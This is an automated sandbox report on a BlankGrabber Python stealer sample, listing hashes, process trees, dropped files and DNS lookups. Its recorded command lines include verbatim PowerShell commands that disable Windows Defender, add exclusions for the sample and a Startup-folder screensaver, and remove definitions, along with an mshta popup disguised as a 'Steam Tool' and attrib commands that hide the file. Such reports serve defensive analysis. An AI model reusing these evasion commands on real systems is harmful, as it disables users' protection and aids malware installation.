Malware Analysis Report

2024-10-10 08:31

Sample ID 240621-dh27ta1bjk
Target 8329370648873513ab96c3754868c3d3.bin
SHA256 1b113b3fc34dddb83d165a91e37bcf00afe61dbdf4be216e6ef518aeae7e47cf
Tags
blankgrabber upx defense_evasion execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1b113b3fc34dddb83d165a91e37bcf00afe61dbdf4be216e6ef518aeae7e47cf

Threat Level: Known bad

The file 8329370648873513ab96c3754868c3d3.bin was found to be: Known bad.

Malicious Activity Summary

blankgrabber upx defense_evasion execution

A stealer written in Python and packaged with Pyinstaller

Blankgrabber family

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

UPX packed file

Hide Artifacts: Hidden Files and Directories

Suspicious use of WriteProcessMemory

Views/modifies file attributes

Detects videocard installed

Enumerates processes with tasklist

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-21 03:01

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-21 03:01

Reported

2024-06-21 03:04

Platform

win7-20240611-en

Max time kernel

117s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe

"C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe"

C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe

"C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI21922\python311.dll

MD5 1e76961ca11f929e4213fca8272d0194
SHA1 e52763b7ba970c3b14554065f8c2404112f53596
SHA256 8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0
SHA512 ec6ed913e0142a98cd7f6adced5671334ec6545e583284ae10627162b199e55867d7cf28efeaadce9862c978b01c234a850288e529d2d3e2ac7dbbb99c6cde9b

memory/3040-23-0x000007FEF5F40000-0x000007FEF652A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-21 03:01

Reported

2024-06-21 03:04

Platform

win10v2004-20240508-en

Max time kernel

141s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2024 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe
PID 2024 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe
PID 1548 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3456 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 3456 wrote to memory of 4948 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3456 wrote to memory of 4948 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1068 wrote to memory of 1648 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1068 wrote to memory of 1648 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3256 wrote to memory of 728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3428 wrote to memory of 5012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 3428 wrote to memory of 5012 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1548 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 2332 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2332 wrote to memory of 2176 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1548 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 4608 wrote to memory of 3068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4608 wrote to memory of 3068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1548 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 3424 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3424 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1548 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 2496 wrote to memory of 3688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2496 wrote to memory of 3688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1548 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 3312 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3312 wrote to memory of 3636 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1548 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1548 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe C:\Windows\system32\cmd.exe
PID 1952 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1952 wrote to memory of 1684 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3152 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3152 wrote to memory of 1064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe

"C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe"

C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe

"C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Steam Tool is extracting | ETA : 3 Minutes', 0, '[Steam Tool] Downloading..', 48+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe'

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Steam Tool is extracting | ETA : 3 Minutes', 0, '[Steam Tool] Downloading..', 48+16);close()"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Local\Temp\8329370648873513ab96c3754868c3d3.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 blank-j1ekc.in udp
US 8.8.8.8:53 blank-j1ekc.in udp
US 8.8.8.8:53 blank-j1ekc.in udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp
US 8.8.8.8:53 gstatic.com udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI20242\python311.dll

MD5 1e76961ca11f929e4213fca8272d0194
SHA1 e52763b7ba970c3b14554065f8c2404112f53596
SHA256 8a0c27f9e5b2efd54e41d7e7067d7cb1c6d23bae5229f6d750f89568566227b0
SHA512 ec6ed913e0142a98cd7f6adced5671334ec6545e583284ae10627162b199e55867d7cf28efeaadce9862c978b01c234a850288e529d2d3e2ac7dbbb99c6cde9b

C:\Users\Admin\AppData\Local\Temp\_MEI20242\VCRUNTIME140.dll

MD5 870fea4e961e2fbd00110d3783e529be
SHA1 a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA256 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA512 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

memory/1548-25-0x00007FFE77330000-0x00007FFE7791A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI20242\base_library.zip

MD5 2efeab81308c47666dfffc980b9fe559
SHA1 8fbb7bbdb97e888220df45cc5732595961dbe067
SHA256 a20eeb4ba2069863d40e4feab2136ca5be183887b6368e32f1a12c780a5af1ad
SHA512 39b030931a7a5940edc40607dcc9da7ca1bf479e34ebf45a1623a67d38b98eb4337b047cc8261038d27ed9e9d6f2b120abbf140c6c90d866cdba0a4c810ac32c

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_ctypes.pyd

MD5 7ecc651b0bcf9b93747a710d67f6c457
SHA1 ebb6dcd3998af9fff869184017f2106d7a9c18f3
SHA256 b43963b0883ba2e99f2b7dd2110d33063071656c35e6575fca203595c1c32b1a
SHA512 1ff4837e100bc76f08f4f2e9a7314bcaf23ebfa4f9a82dc97615cde1f3d29416004c6346e51afc6e61360573df5fcd2a3b692fd544ccad5c616fb63ac49303c5

C:\Users\Admin\AppData\Local\Temp\_MEI20242\libffi-8.dll

MD5 87786718f8c46d4b870f46bcb9df7499
SHA1 a63098aabe72a3ed58def0b59f5671f2fd58650b
SHA256 1928574a8263d2c8c17df70291f26477a1e5e8b3b9ab4c4ff301f3bc5ce5ca33
SHA512 3abf0a3448709da6b196fe9238615d9d0800051786c9691f7949abb3e41dfb5bdaf4380a620e72e1df9e780f9f34e31caad756d2a69cad894e9692aa161be9f7

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_ssl.pyd

MD5 8f94142c7b4015e780011c1b883a2b2f
SHA1 c9c3c1277cca1e8fe8db366ca0ecb4a264048f05
SHA256 8b6c028a327e887f1b2ccd35661c4c7c499160e0680ca193b5c818327a72838c
SHA512 7e29163a83601ed1078c03004b3d40542e261fda3b15f22c2feec2531b05254189ae1809c71f9df78a460bf2282635e2287617f2992b6b101854ddd74fcad143

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_sqlite3.pyd

MD5 72a0715cb59c5a84a9d232c95f45bf57
SHA1 3ed02aa8c18f793e7d16cc476348c10ce259feb7
SHA256 d125e113e69a49e46c5534040080bdb35b403eb4ff4e74abf963bce84a6c26ad
SHA512 73c0e768ee0c2e6ac660338d2268540254efe44901e17271595f20f335ada3a9a8af70845e8a253d83a848d800145f7ecb23c92be90e7dd6e5400f72122d09de

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_socket.pyd

MD5 57dc6a74a8f2faaca1ba5d330d7c8b4b
SHA1 905d90741342ac566b02808ad0f69e552bb08930
SHA256 5b73b9ea327f7fb4cefddd65d6050cdec2832e2e634fcbf4e98e0f28d75ad7ca
SHA512 5e2b882fc51f48c469041028b01f6e2bfaf5a49005ade7e82acb375709e74ad49e13d04fd7acb6c0dbe05f06e9966a94753874132baf87858e1a71dcffc1dc07

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_queue.pyd

MD5 f1e7c157b687c7e041deadd112d61316
SHA1 2a7445173518a342d2e39b19825cf3e3c839a5fe
SHA256 d92eadb90aed96acb5fac03bc79553f4549035ea2e9d03713d420c236cd37339
SHA512 982fd974e5892af9f360dc4c7ccaa59928e395ccef8ea675fadb4cf5f16b29350bf44c91ea1fd58d90cbca02522eba9543162e19c38817edbfd118bc254515da

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_lzma.pyd

MD5 71f0b9f90aa4bb5e605df0ea58673578
SHA1 c7c01a11b47dc6a447c7475ef6ba7dec7c7ba24e
SHA256 d0e10445281cf3195c2a1aa4e0e937d69cae07c492b74c9c796498db33e9f535
SHA512 fc63b8b48d6786caecaf1aa3936e5f2d8fcf44a5a735f56c4200bc639d0cb9c367151a7626aa5384f6fc126a2bd0f068f43fd79277d7ec9adfc4dcb4b8398ae2

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_hashlib.pyd

MD5 7edb6c172c0e44913e166abb50e6fba6
SHA1 3f8c7d0ff8981d49843372572f93a6923f61e8ed
SHA256 258ad0d7e8b2333b4b260530e14ebe6abd12cae0316c4549e276301e5865b531
SHA512 2a59cc13a151d8800a29b4f9657165027e5bf62be1d13c2e12529ef6b7674657435bfd3cc16500b2aa7ce95b405791dd007c01adf4cdd229746bd2218bfdc03f

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_decimal.pyd

MD5 0cfe09615338c6450ac48dd386f545fd
SHA1 61f5bd7d90ec51e4033956e9ae1cfde9dc2544fe
SHA256 a0fa3ad93f98f523d189a8de951e42f70cc1446793098151fc50ba6b5565f2e3
SHA512 42b293e58638074ce950775f5ef10ec1a0bb5980d0df74ad89907a17f7016d68e56c6ded1338e9d04d19651f48448deee33a0657d3c03adba89406d6e5f10c18

C:\Users\Admin\AppData\Local\Temp\_MEI20242\_bz2.pyd

MD5 83b5d1943ac896a785da5343614b16bc
SHA1 9d94b7f374030fed7f6e876434907561a496f5d9
SHA256 bf79ddbfa1cc4df7987224ee604c71d9e8e7775b9109bf4ff666af189d89398a
SHA512 5e7dcc80ac85bd6dfc4075863731ea8da82edbb3f8ffafba7b235660a1bd0c60f7dfde2f7e835379388de277f9c1ceae7f209495f868cb2bd7db0de16495633c

C:\Users\Admin\AppData\Local\Temp\_MEI20242\unicodedata.pyd

MD5 908e8c719267692de04434ab9527f16e
SHA1 5657def35fbd3e5e088853f805eddd6b7b2b3ce9
SHA256 4337d02a4b24467a48b37f1ccbcebd1476ff10bdb6511fbb80030bbe45a25239
SHA512 4f9912803f1fa9f8a376f56e40a6608a0b398915b346d50b6539737f9b75d8e9a905beb5aace5fe69ba8847d815c600eb20330e79a2492168735b5cfdceff39a

C:\Users\Admin\AppData\Local\Temp\_MEI20242\sqlite3.dll

MD5 abe8eec6b8876ddad5a7d60640664f40
SHA1 0b3b948a1a29548a73aaf8d8148ab97616210473
SHA256 26fc80633494181388cf382f417389c59c28e9ffedde8c391d95eddb6840b20d
SHA512 de978d97c04bad9ebb3f423210cbcb1b78a07c21daadc5c166e00206ece8dcd7baac1d67c84923c9cc79c8b9dfbec719ce7b5f17343a069527bba1a4d0454c29

C:\Users\Admin\AppData\Local\Temp\_MEI20242\select.pyd

MD5 938c814cc992fe0ba83c6f0c78d93d3f
SHA1 e7c97e733826e53ff5f1317b947bb3ef76adb520
SHA256 9c9b62c84c2373ba509c42adbca01ad184cd525a81ccbcc92991e0f84735696e
SHA512 2f175f575e49de4b8b820171565aedb7474d52ae9914e0a541d994ff9fea38971dd5a34ee30cc570920b8618393fc40ab08699af731005542e02a6a0095691f0

C:\Users\Admin\AppData\Local\Temp\_MEI20242\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI20242\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
